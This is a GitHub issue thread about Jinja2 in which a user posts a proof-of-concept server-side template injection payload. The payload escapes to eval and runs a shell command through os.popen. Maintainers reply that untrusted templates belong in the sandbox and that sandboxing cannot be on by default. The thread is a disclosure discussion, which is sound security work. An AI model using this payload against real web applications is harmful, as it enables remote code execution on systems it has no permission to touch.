Jinja: Execute arbitrary codes in template without sandbox environment.

Created on 23 Feb 2016 · 6Comments · Source: pallets/jinja

When i use Jinja2 template framework in my project, i found a way to call "os.popen('id')" or another functions without global register.
It's easy to get shell when attacker can control the template content. Is that such a design?

PoC:

from jinja2 import Template

content = '''
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %} {% endif %} {% endfor %}
{% endif %} {% endfor %}
'''
print Template(content).render()

I test this code with python2 (2.7.10) and Jinja2 (2.8), if it works will print your user's uid...

Source

RickGray

👍1

Most helpful comment

You should not execute untrusted templates in a non-sandboxed environment. That's exactly why the sandbox exists (and to be honest, even with a sandbox I would not let users provide arbitrary Jinja templates)

ThiefMaster on 23 Feb 2016

👍2

All 6 comments

ThiefMaster on 23 Feb 2016

👍2

So, is it necessary to take measures to prevent this case? I think there some specific application would allow users to edit the template content, but there is no practical examples.

RickGray on 24 Feb 2016

I think it is necessary to use sandbox by defualt, because flask or another web framework used Jinja2 is not do this.

RickGray on 24 Feb 2016

Why would you want to use the sandbox by default? In most cases templates cannot be changed by untrusted people who don't have access to the code anyway.

ThiefMaster on 24 Feb 2016

👎1

There is a case about remote code execution via Flask/Jinja2 template injection in Uber.
link: http://www.tuicool.com/articles/uE3YNjY

RickGray on 29 Mar 2016

Enabling sandboxing by default is not possible due to backwards compat, and also not reasonable because most templates (in Flask) are trusted.